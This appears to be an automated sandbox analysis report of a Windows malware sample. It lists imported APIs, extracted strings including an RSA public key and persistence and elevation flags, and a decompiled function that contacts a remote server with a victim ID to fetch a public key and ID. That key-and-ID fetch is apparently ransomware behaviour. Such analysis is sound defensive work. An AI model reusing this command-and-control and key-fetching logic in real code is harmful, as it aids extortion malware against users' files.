0x0041b428
0x0041b42d
0x0041b43d
0x0041b443
0x0041b449
0x0041b44f
0x0041b45d
0x0041b466
0x0041b47e
0x0041b483
0x0041b483
0x0041b3f0
0x0041b495
0x0041b49a
0x0041b4b3
0x0041b4bb
0x0041b4bd
0x0041b4c5
0x0041b4cd
0x0041b4d7
0x0041b4e7
0x0041b4e9
0x0041b4e9
0x0041b4c5
0x0041b4ed
0x0041b4fe
0x0041b500
0x0041b509
0x0041b510
0x0041b520
0x0041b522
0x0041b524
0x0041b526
0x0041b52e
0x0041b540
0x0041b542
0x0041b542
0x0041b526
0x0041b54e
0x0041b554
0x0041b554
0x0041b510
0x0041b55b
0x0041b560
0x0041b562
0x0041b56b
0x0041b570
0x0041b580
0x0041b582
0x0041b584
0x0041b586
0x0041b58e
0x0041b5a0
0x0041b5a2
0x0041b5a2
0x0041b586
0x0041b5ae
0x0041b5b4
0x0041b5b4
0x0041b570
0x0041b5bb
0x0041b5c2
0x0041b5c7
0x0041b5c9
0x0041b5c9
0x0041b5ce
0x0041b5d0
0x0041b5d3
0x0041b5d3
0x0041b5d9
0x0041b5e4
0x0041b34f
0x0041b34f
0x0041b34f
0x0041b5ed
0x0041b5f9
0x0041b605
0x0041b611
0x0041b61d
0x0041a9d1
0x0041a9d1
0x0041a9d1
0x0041b629
0x0041a624
0x0041a624
0x0041a62a
0x0041a62c
0x00000000
0x0041a632
0x0041a63f
0x0041a652
0x0041a661
0x0041a66f
0x0041a67b
0x0041a686
0x0041a68d
0x0041a697
0x0041a6a2
0x0041a6a9
0x0041a6ac
0x0041a6b0
0x0041a6b2
0x0041a6b2
0x0041a6b4
0x0041a6c3
0x0041a6ce
0x0041a6d9
0x0041a6df
0x0041a6e1
0x0041a6fe
0x0041a6fe
0x00000000
0x0041a6e3
0x0041a6e3
0x0041a6e3
0x0041a6e1
0x0041a62c
0x0041a61e
0x0041a612
0x0041a60a
0x0041b635
0x0041b641
0x0041b64d
0x0041b659
0x0041b666
0x0041a466
0x0041a46d
0x0041a46f
0x0041a47c
0x0041a47c
0x0041a196
0x0041a196
0x0041a19d
0x0041a1a1
0x0041a1a7
0x0041a1b4
0x0041a1bc
0x0041a1c1
0x0041a1c4
0x0041a1c6
0x0041a1ca
0x00000000
0x00000000
0x0041a1df
0x0041a1eb
0x0041a1f3
0x0041a201
0x0041a20b
0x0041a20e
0x0041a217
0x0041a21a
0x0041a21f
0x0041a222
0x0041a226
0x0041a323
0x0041a323
0x0041a328
0x0041a32c
0x0041a32f
0x0041a333
0x0041a337
0x0041a1b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a22e
0x0041a236
0x0041a23b
0x0041a23e
0x0041a240
0x0041a244
0x0041a2d5
0x0041a2da
0x0041a2dd
0x0041a2df
0x0041a2f4
0x0041a2f9
0x0041a2fc
0x0041a2fe
0x0041a313
0x0041a318
0x0041a31b
0x0041a31d
0x0041a361
0x0041a371
0x0041a373
0x0041a380
0x0041a38f
0x0041a395
0x0041a3a3
0x0041a3a5
0x0041a3a7
0x00000000
0x00000000
0x0041a3af
0x0041a3b8
0x0041a3c7
0x0041a3c9
0x00000000
0x0041a3cb
0x0041a3cb
0x0041a3d0
0x0041a3d2
0x0041a3e3
0x0041a3f0
0x0041a3f2
0x0041a3ff
0x0041a3d4
0x0041a3d6
0x0041a3dc
0x00000000
0x0041a3dc
0x0041a3d2
0x00000000
0x0041a3c9
0x0041a406
0x0041a40e
0x0041a41b
0x0041a41d
0x0041a42b
0x0041a436
0x0041a43d
0x0041a44a
0x0041a44c
0x0041a459
0x00000000
0x00000000
0x00000000
0x0041a300
0x0041a300
0x00000000
0x0041a300
0x0041a2e1
0x0041a2e1
0x0041a31f
0x0041a31f
0x00000000
0x0041a31f
0x0041a24a
0x0041a24e
0x0041a25a
0x0041a267
0x0041a282
0x0041a28c
0x0041a293
0x0041a2a8
0x0041a2b2
0x0041a2b9
0x0041a2be
0x0041a2c1
0x0041a2c4
0x0041a2c8
0x00000000
0x0041a2c8
0x00000000
0x0041a244
0x0041a1b4
0x0041a190
0x0041a05f
0x00419fb4
0x00419fb4
0x00419fc1
0x00419fc1
0x00000000

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0062DAB0,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

IsNotTask, xrefs: 0041A654
C:\Windows\, xrefs: 0041AE0F
--Admin, xrefs: 0041A1B4, 0041A632
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
D:\Program Files (x86)\Google\, xrefs: 0041B085
IsNotAutoStart, xrefs: 0041A645
7P, xrefs: 0041B164
x*P, xrefs: 0041ACE4
x2Q, xrefs: 0041A856
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
D:\Windows\, xrefs: 0041AFF3
I:\5d2860c89d774.jpg, xrefs: 0041B32F
--AutoStart, xrefs: 0041A2EC
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
--ForNetRes, xrefs: 0041A22E
-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZ, xrefs: 0041A255, 0041A37B, 0041A847, 0041A955, 0041A962, 0041A97F, 0041A980, 0041A9F2, 0041A9FF, 0041AA16, 0041AA17
C:\Program Files\Google\, xrefs: 0041AFB9
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
D:\Program Files\Google\, xrefs: 0041B0EE
F:\, xrefs: 0041B397
--Service, xrefs: 0041A30B
IsTask, xrefs: 0041A1EE, 0041A299
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
<, xrefs: 0041A67B
%username%, xrefs: 0041B283
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
--Task, xrefs: 0041A2CD
list<T> too long, xrefs: 0041B669, 0041B673
IsAutoStart, xrefs: 0041A1D0, 0041A273
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
runas, xrefs: 0041A6CE
X1P, xrefs: 0041A485
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZ$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-2630044443
Opcode ID: 4079c90fc7f754fbab04c6abe6dcc5faeb17661ca15ca8b8e25480f0a4780036
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 4079c90fc7f754fbab04c6abe6dcc5faeb17661ca15ca8b8e25480f0a4780036
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0041E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696
stringnetworkfileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E0041E690(void* __ecx, intOrPtr __edx, char _a4, char _a8, char _a16, char _a256, char _a264, char _a268, char _a272, void _a296, char _a360, char _a361, char _a1292, char _a1296, short _a2368, signed int _a22780, char _a22800, intOrPtr _a22804, int _a22812, char _a22856, intOrPtr _a22880) {
				short _v0;
				char _v4;
				short _v8;
				char _v12;
				char _v14;
				char _v15;
				char _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				char _v45;
				WCHAR* _v48;
				char _v52;
				char _v54;
				intOrPtr _v57;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				long _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				WCHAR* _v100;
				char _v101;
				intOrPtr _v103;
				signed int _v104;
				intOrPtr _v107;
				signed int _v108;
				intOrPtr _v109;
				char _v111;
				char _v122;
				intOrPtr _v134;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t213;
				void* _t216;
				signed int _t219;
				signed int _t223;
				void* _t227;
				void* _t241;
				signed int _t250;
				signed int _t251;
				WCHAR* _t254;
				signed int _t265;
				int _t266;
				signed int _t274;
				signed int _t275;
				WCHAR* _t278;
				signed int _t288;
				signed int _t291;
				signed int _t294;
				WCHAR* _t298;
				WCHAR* _t303;
				signed int _t313;
				signed int _t318;
				int _t321;
				signed int _t322;
				int _t329;
				char* _t330;
				signed int _t336;
				signed int _t340;
				WCHAR* _t346;
				signed int _t361;
				char _t367;
				void* _t368;
				WCHAR* _t369;
				WCHAR* _t373;
				WCHAR* _t374;
				signed int _t375;
				char _t377;
				signed int* _t381;
				signed int _t382;
				signed int _t383;
				char* _t386;
				intOrPtr* _t389;
				signed int _t390;
				intOrPtr* _t397;
				signed int _t398;
				intOrPtr* _t403;
				signed int _t404;
				intOrPtr* _t407;
				signed int _t408;
				char* _t410;
				char* _t412;
				short* _t415;
				signed int* _t418;
				char* _t419;
				char* _t421;
				intOrPtr* _t423;
				intOrPtr* _t425;
				void* _t429;
				char _t430;
				void* _t431;
				WCHAR* _t432;
				void* _t433;
				WCHAR* _t434;
				char _t435;
				void* _t439;
				unsigned int _t440;
				signed int _t442;
				void* _t443;
				unsigned int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				char* _t457;
				char* _t458;
				void* _t459;
				char* _t462;
				void* _t463;
				void* _t465;
				void* _t466;
				char* _t467;
				void* _t468;
				char* _t469;
				void* _t470;
				short* _t472;

				_t417 = __edx;
				_t453 = _t452 & 0xfffffff8;
				_push(0xffffffff);
				_push(E004CB3EC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t453;
				_push(__ecx);
				E0042F7C0(0x597c);
				_t367 = _a4;
				_push(_t437);
				 *((char*)(_t367 + 4)) = 1;
				E00423F74(timeGetTime());
				_t454 = _t453 + 4; // executed
				_t213 = E0040C6A0(); // executed
				_v14 = _t213;
				_v8 = 4;
				while(1) {
					_t429 = lstrlenA;
					do {
						do {
							while(1) {
								L2:
								_a360 = 0;
								E0042B420( &_a361, 0, 0x3ff);
								_t455 = _t454 + 0xc;
								_v15 = 0;
								_t216 = E0040C500( &_a360, _t417); // executed
								if(_t216 == 0) {
									goto L4;
								} else {
									_v15 = 1;
								}
								L35:
								_v100 = 0;
								_t437 = 0;
								_t241 = E00423CF0( &_a272, "{\"public_key\":\"");
								_t454 = _t455 + 8;
								if(_t241 != 0) {
									lstrcpyA( &_a1296, _t454 + lstrlenA("{\"public_key\":\"") + 0x188);
									lstrcpyA( &_a272,  &_a1296);
									_t250 = lstrlenA( &_a272);
									__eflags = _t250;
									if(_t250 <= 0) {
										L45:
										_t458 = _t454 - 0x18;
										_v101 = 0;
										_t419 = _t458;
										 *(_t419 + 0x14) = 0xf;
										 *(_t419 + 0x10) = 0;
										 *_t419 = 0;
										__eflags = _a272;
										if(_a272 != 0) {
											_t389 =  &_a272;
											_t97 = _t389 + 1; // 0x1
											_t439 = _t97;
											do {
												_t251 =  *_t389;
												_t389 = _t389 + 1;
												__eflags = _t251;
											} while (_t251 != 0);
											_t390 = _t389 - _t439;
											__eflags = _t390;
											L50:
											_push(_t390);
											E004156D0(_t367, _t419, _t429,  &_a272);
											_t420 = _v109;
											_t254 = E00412900( &_v72, _v109);
											_t459 = _t458 + 0x18;
											__eflags = _t254[0xa] - 8;
											if(_t254[0xa] >= 8) {
												_t254 =  *_t254;
											}
											_t369 = _t367 + 0x7550;
											lstrcpyW(_t369, _t254);
											__eflags = _v48 - 8;
											if(_v48 >= 8) {
												L00422587(_v68);
												_t459 = _t459 + 4;
											}
											_t440 = 2 + lstrlenA( &_a268) * 2;
											_t432 = E00420C62(_t369, _t420, _t429, _t440);
											E0042B420(_t432, 0, _t440);
											_t437 = _t440 >> 1;
											MultiByteToWideChar(0, 0,  &_a268, 0xffffffff, _t432, _t440 >> 1);
											lstrcpyW(_t369, _t432);
											_t417 = 0;
											 *((short*)(_a4 + 0x7550 + _v104 * 2)) = 0;
											_t265 = E00423CF0( &_a268, "\",\"id\":\"");
											_t454 = _t459 + 0x18;
											__eflags = _t265;
											if(_t265 != 0) {
												_t266 = lstrlenW(_t369);
												_t433 = lstrlenA;
												lstrcpyA( &_a1292,  &(( &(( &_a268)[lstrlenA("\",\"id\":\"")]))[_t266]));
												lstrcpyA( &_a268,  &_a1292);
												_v104 = 0;
												_t442 = 0;
												_t274 = lstrlenA( &_a268);
												__eflags = _t274;
												if(_t274 <= 0) {
													L64:
													_t462 = _t454 - 0x18;
													_t421 = _t462;
													 *(_t421 + 0x14) = 0xf;
													 *(_t421 + 0x10) = 0;
													 *_t421 = 0;
													__eflags = _a268;
													if(_a268 != 0) {
														_t397 =  &_a268;
														_t443 = _t397 + 1;
														do {
															_t275 =  *_t397;
															_t397 = _t397 + 1;
															__eflags = _t275;
														} while (_t275 != 0);
														_t398 = _t397 - _t443;
														__eflags = _t398;
														L69:
														_push(_t398);
														E004156D0(0, _t421, _t433,  &_a268);
														_t417 = 0;
														_t278 = E00412900( &_v76, 0);
														_t463 = _t462 + 0x18;
														__eflags = _t278[0xa] - 8;
														if(_t278[0xa] >= 8) {
															_t278 =  *_t278;
														}
														_t373 = _a4 + 0xea80;
														lstrcpyW(_t373, _t278);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v72);
															_t463 = _t463 + 4;
														}
														_t444 = 2 + lstrlenA( &_a264) * 2;
														_t434 = E00420C62(_t373, _t417, _t433, _t444);
														E0042B420(_t434, 0, _t444);
														_t454 = _t463 + 0x10;
														MultiByteToWideChar(0, 0,  &_a264, 0xffffffff, _t434, _t444 >> 1);
														lstrcpyW(_t373, _t434);
														_t435 = _a4;
														_t437 = _t435 + 0x7550;
														 *((short*)(_t435 + 0xea80 + _v108 * 2)) = 0;
														_t288 = lstrlenW(_t437);
														__eflags = _t288;
														if(_t288 <= 0) {
															L75:
															__eflags = _v111;
															if(_v111 == 0) {
																__eflags = _t437;
																if(_t437 != 0) {
																	E00420BED(_t437);
																	_t454 = _t454 + 4;
																}
																__eflags = _t373;
																if(_t373 != 0) {
																	E00420BED(_t373);
																	_t454 = _t454 + 4;
																}
																goto L82;
															}
															goto L76;
														} else {
															_t318 = lstrlenW(_t373);
															__eflags = _t318;
															if(_t318 != 0) {
																 *((char*)(_t435 + 4)) = 0;
																goto L112;
															}
															goto L75;
														}
													}
													_t398 = 0;
													goto L69;
												}
												while(1) {
													__eflags =  *((char*)(_t454 + _t442 + 0x188)) - 0x22;
													if( *((char*)(_t454 + _t442 + 0x188)) == 0x22) {
														break;
													}
													_t442 = _t442 + 1;
													_t321 = lstrlenA( &_a268);
													__eflags = _t442 - _t321;
													if(_t442 < _t321) {
														continue;
													}
													goto L64;
												}
												_v104 = _t442;
												goto L64;
											} else {
												__eflags = _v107 - _t265;
												if(_v107 == _t265) {
													L82:
													E00411B10();
													_t437 = _v104 - 1;
													_v104 = _t437;
													__eflags = _t437;
													if(__eflags <= 0) {
														E0040EF50(0x510020,  &_v104, __eflags, 0x10);
														_t465 = _t454 + 4;
														_v4 = 0xf;
														_v8 = 0;
														_v24 = 0;
														_a22804 = 2;
														_t447 = 0;
														__eflags = 0;
														_t374 = _v104;
														do {
															_t423 =  *((intOrPtr*)(_t374 + _t447 * 4));
															__eflags =  *_t423;
															if( *_t423 != 0) {
																_t403 = _t423;
																_t435 = _t403 + 1;
																do {
																	_t291 =  *_t403;
																	_t403 = _t403 + 1;
																	__eflags = _t291;
																} while (_t291 != 0);
																_t404 = _t403 - _t435;
																__eflags = _t404;
																goto L91;
															}
															_t404 = 0;
															L91:
															_push(_t404);
															E00413EA0(_t374,  &_v24, _t435, _t447, _t423);
															_t447 = _t447 + 1;
															__eflags = _t447 - 0x10;
														} while (__eflags < 0);
														E0040EF50(0x510060,  &_v108, __eflags, 0x10);
														_t466 = _t465 + 4;
														_v32 = 0xf;
														_v36 = 0;
														_v52 = 0;
														_a22800 = 3;
														_t448 = 0;
														__eflags = 0;
														_t375 = _v108;
														do {
															_t425 =  *((intOrPtr*)(_t375 + _t448 * 4));
															__eflags =  *_t425;
															if( *_t425 != 0) {
																_t407 = _t425;
																_t435 = _t407 + 1;
																do {
																	_t294 =  *_t407;
																	_t407 = _t407 + 1;
																	__eflags = _t294;
																} while (_t294 != 0);
																_t408 = _t407 - _t435;
																__eflags = _t408;
																goto L98;
															}
															_t408 = 0;
															L98:
															_push(_t408);
															E00413EA0(_t375,  &_v52, _t435, _t448, _t425);
															_t448 = _t448 + 1;
															__eflags = _t448 - 0x10;
														} while (_t448 < 0x10);
														_t467 = _t466 - 0x18;
														_t410 = _t467;
														_push(0xffffffff);
														 *(_t410 + 0x14) = 0xf;
														 *(_t410 + 0x10) = 0;
														 *_t410 = 0;
														E00413FF0(0, _t410,  &_v32, 0);
														_t298 = E00412900( &_v92, 0);
														_t468 = _t467 + 0x18;
														__eflags = _t298[0xa] - 8;
														if(_t298[0xa] >= 8) {
															_t298 =  *_t298;
														}
														_t377 = _a4;
														lstrcpyW(_t377 + 0x7550, _t298);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v84);
															_t468 = _t468 + 4;
														}
														_t469 = _t468 - 0x18;
														_v122 = 0;
														_t412 = _t469;
														_push(0xffffffff);
														 *(_t412 + 0x14) = 0xf;
														 *(_t412 + 0x10) = 0;
														 *_t412 = 0;
														E00413FF0(_t377, _t412,  &_v60, 0);
														_t303 = E00412900( &_v96, _v134);
														_t470 = _t469 + 0x18;
														__eflags = _t303[0xa] - 8;
														if(_t303[0xa] >= 8) {
															_t303 =  *_t303;
														}
														lstrcpyW(_t377 + 0xea80, _t303);
														__eflags = _v68 - 8;
														if(_v68 >= 8) {
															L00422587(_v88);
															_t470 = _t470 + 4;
														}
														__eflags = _v44 - 0x10;
														 *((char*)(_t377 + 0x15fb7)) = 1;
														if(_v44 >= 0x10) {
															L00422587(_v64);
															_t470 = _t470 + 4;
														}
														__eflags = _v20 - 0x10;
														_v44 = 0xf;
														_v48 = 0;
														_v64 = 0;
														if(_v20 >= 0x10) {
															L00422587(_v40);
														}
														 *((char*)(_t377 + 4)) = 0;
														L112:
														__eflags = 0;
														 *[fs:0x0] = _a22780;
														return 0;
													}
													_t367 = _a4;
													while(1) {
														_t429 = lstrlenA;
														L2:
														_a360 = 0;
														E0042B420( &_a361, 0, 0x3ff);
														_t455 = _t454 + 0xc;
														_v15 = 0;
														_t216 = E0040C500( &_a360, _t417); // executed
														if(_t216 == 0) {
															goto L4;
														} else {
															_v15 = 1;
														}
													}
												}
												break;
											}
										}
										_t390 = 0;
										goto L50;
									}
									while(1) {
										__eflags =  *((char*)(_t454 +  &(_t437[0xc4]))) - 0x22;
										if( *((char*)(_t454 +  &(_t437[0xc4]))) == 0x22) {
											break;
										}
										_t437 =  &(_t437[0]);
										_t329 = lstrlenA( &_a272);
										__eflags = _t437 - _t329;
										if(_t437 < _t329) {
											continue;
										}
										goto L45;
									}
									_v100 = _t437;
									goto L45;
								}
								if(_v103 == _t241) {
									goto L82;
								}
								_t330 =  &_a8;
								__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t330);
								if(_t330 >= 0) {
									PathAppendA( &_v12, "bowsakkdestx.txt");
									DeleteFileA( &_v16);
								}
								continue;
								L4:
								_v12 = 0;
								_t368 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0);
								_v0 = 7;
								_v4 = 0;
								_v20 = 0;
								_t430 = _a4;
								_t418 = _t430 + 0x20;
								_a22880 = 0;
								__eflags =  *_t418;
								if( *_t418 != 0) {
									_t381 = _t418;
									_t437 =  &(_t381[0]);
									goto L7;
									L7:
									_t219 =  *_t381;
									_t381 =  &(_t381[0]);
									__eflags = _t219;
									if(_t219 != 0) {
										goto L7;
									} else {
										_t382 = _t381 - _t437;
										__eflags = _t382;
										_t383 = _t382 >> 1;
										goto L9;
									}
								} else {
									_t383 = 0;
									L9:
									_push(_t383);
									E00415AE0(_t368,  &_v20, _t430, _t437, _t418);
									__eflags = _v8 - 8;
									_push(L".bit/");
									_t222 =  >=  ? _v28 :  &_v28;
									_push( >=  ? _v28 :  &_v28);
									_t223 = E00421C02( &_v20);
									_t456 = _t455 + 8;
									__eflags = _t223;
									if(_t223 != 0) {
										_t472 = _t456 - 0x18;
										_t415 = _t472;
										_push(0xffffffff);
										 *(_t415 + 0x14) = 7;
										 *(_t415 + 0x10) = 0;
										 *_t415 = 0;
										E00414690(_t368, _t415,  &_v24, 0);
										_t437 = E0040DD40( &_v12);
										_t456 = _t472 + 0x18;
										__eflags =  &_v36 - _t437;
										if( &_v36 != _t437) {
											_v8 = 7;
											_v12 = 0;
											_v28 = 0;
											__eflags = _t437[0xa] - 8;
											if(_t437[0xa] >= 8) {
												_v28 =  *_t437;
												 *_t437 = 0;
											} else {
												_t361 = _t437[8] + 1;
												__eflags = _t361;
												if(_t361 != 0) {
													E004205A0( &_v28, _t437, _t361 + _t361);
													_t456 = _t456 + 0xc;
												}
											}
											_v12 = _t437[8];
											_v8 = _t437[0xa];
											__eflags = 0;
											_t437[0xa] = 7;
											_t437[8] = 0;
											 *_t437 = 0;
										}
										__eflags = _a16 - 8;
										if(_a16 >= 8) {
											L00422587(_v4);
											_t456 = _t456 + 4;
										}
									}
									_push(5);
									E00415AE0(_t368,  &_v24, _t430, _t437, L"?pid=");
									_t457 = _t456 - 0x18;
									_v45 = 0;
									_t386 = _t457;
									_push(0xffffffff);
									 *(_t386 + 0x14) = 0xf;
									 *(_t386 + 0x10) = 0;
									 *_t386 = 0;
									E00413FF0(_t368, _t386, _t430 + 8, 0);
									_t417 = _v57;
									_t227 = E00412900( &_v20, _v57);
									_t455 = _t457 + 0x18;
									_push(0xffffffff);
									_push(0);
									_a22856 = 1;
									E004159D0(_t368,  &_v44, _t430, _t437, _t227);
									__eflags = _v12 - 8;
									if(_v12 >= 8) {
										L00422587(_v16);
										_t455 = _t455 + 4;
									}
									__eflags = _v20 - 8;
									_t230 =  >=  ? _v40 :  &_v40;
									lstrcpyW( &_a2368,  >=  ? _v40 :  &_v40);
									__eflags =  *((char*)(_t430 + 0x15fb5));
									if( *((char*)(_t430 + 0x15fb5)) == 0) {
										__eflags =  *((char*)(_t430 + 0x15fb6));
										if( *((char*)(_t430 + 0x15fb6)) == 0) {
											__eflags = _v54;
											_t346 =  &_a2368;
											if(_v54 == 0) {
												_push(L"&first=false");
											} else {
												_push(L"&first=true");
											}
											lstrcatW(_t346, ??);
										}
									}
									_t431 = InternetOpenUrlW(_t368,  &_a2368, 0, 0, 0, 0);
									InternetReadFile(_t431,  &_a296, 0x400,  &_v76); // executed
									__eflags = _v92;
									if(_v92 > 0) {
										_t336 =  &_a16;
										__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t336);
										__eflags = _t336;
										if(_t336 >= 0) {
											PathAppendA( &_v4, "bowsakkdestx.txt");
											_t340 = E004220B6( &_v8, "w"); // executed
											_t451 = _t340;
											_t455 = _t455 + 8;
											__eflags = _t451;
											if(__eflags != 0) {
												_push(_t451);
												_push(lstrlenA( &_a256));
												_push(1);
												_push( &_a256);
												E00422B02(_t368, _t417, _t431, _t451, __eflags);
												_push(_t451); // executed
												E00423A38(_t368, _t431, _t451, __eflags); // executed
												_t455 = _t455 + 0x14;
											}
										}
									}
									InternetCloseHandle(_t431); // executed
									InternetCloseHandle(_t368);
									_a22812 = 0xffffffff;
									__eflags = _v68 - 8;
									if(_v68 >= 8) {
										L00422587(_v88);
										_t455 = _t455 + 4;
									}
									_t367 = _a4;
									_t429 = lstrlenA;
									goto L35;
								}
							}
							_t322 =  &_a4;
							__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t322);
							_t429 = lstrlenA;
							_t367 = _a4;
							__eflags = _t322;
						} while (_t322 < 0);
						PathAppendA( &_v16, "bowsakkdestx.txt");
						DeleteFileA( &_v20);
						while(1) {
							_t429 = lstrlenA;
							goto L2;
						}
						L76:
						_t313 =  &_v0;
						__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t313);
						_t429 = lstrlenA;
						_t367 = _a4;
						__eflags = _t313;
					} while (_t313 < 0);
					PathAppendA( &_v20, "bowsakkdestx.txt");
					DeleteFileA( &_v24);
				}
			}

0x0041e690
0x0041e693
0x0041e696
0x0041e698
0x0041e6a3
0x0041e6a4
0x0041e6ab
0x0041e6b1
0x0041e6b7
0x0041e6ba
0x0041e6bc
0x0041e6c7
0x0041e6cc
0x0041e6cf
0x0041e6d4
0x0041e6d8
0x0041e6e0
0x0041e6e0
0x0041e6f0
0x0041e6f0
0x0041e6f0
0x0041e6f0
0x0041e6fc
0x0041e707
0x0041e70c
0x0041e70f
0x0041e71b
0x0041e722
0x00000000
0x0041e724
0x0041e724
0x0041e724
0x0041ea1f
0x0041ea26
0x0041ea34
0x0041ea36
0x0041ea3b
0x0041ea40
0x0041eaa4
0x0041eaba
0x0041eac8
0x0041eaca
0x0041eacc
0x0041eaef
0x0041eaef
0x0041eaf2
0x0041eaf7
0x0041eaf9
0x0041eb00
0x0041eb07
0x0041eb0a
0x0041eb12
0x0041eb18
0x0041eb1f
0x0041eb1f
0x0041eb22
0x0041eb22
0x0041eb24
0x0041eb25
0x0041eb25
0x0041eb29
0x0041eb29
0x0041eb2b
0x0041eb2b
0x0041eb36
0x0041eb3b
0x0041eb43
0x0041eb48
0x0041eb4b
0x0041eb4f
0x0041eb51
0x0041eb51
0x0041eb54
0x0041eb5b
0x0041eb61
0x0041eb66
0x0041eb6c
0x0041eb71
0x0041eb71
0x0041eb7e
0x0041eb8e
0x0041eb94
0x0041eb9c
0x0041ebae
0x0041ebb6
0x0041ebc0
0x0041ebca
0x0041ebda
0x0041ebdf
0x0041ebe2
0x0041ebe4
0x0041ec3e
0x0041ec44
0x0041ec6d
0x0041ec7f
0x0041ec88
0x0041ec91
0x0041ec93
0x0041ec95
0x0041ec97
0x0041ecbf
0x0041ecbf
0x0041ecc4
0x0041ecc6
0x0041eccd
0x0041ecd4
0x0041ecd6
0x0041ecdd
0x0041ece3
0x0041ecea
0x0041ecf0
0x0041ecf0
0x0041ecf2
0x0041ecf3
0x0041ecf3
0x0041ecf7
0x0041ecf7
0x0041ecf9
0x0041ecf9
0x0041ed04
0x0041ed09
0x0041ed0f
0x0041ed14
0x0041ed17
0x0041ed1b
0x0041ed1d
0x0041ed1d
0x0041ed23
0x0041ed2a
0x0041ed30
0x0041ed35
0x0041ed3b
0x0041ed40
0x0041ed40
0x0041ed4d
0x0041ed5d
0x0041ed63
0x0041ed68
0x0041ed7d
0x0041ed85
0x0041ed8b
0x0041ed94
0x0041ed9b
0x0041eda3
0x0041eda9
0x0041edab
0x0041edbc
0x0041edbc
0x0041edc1
0x0041ee10
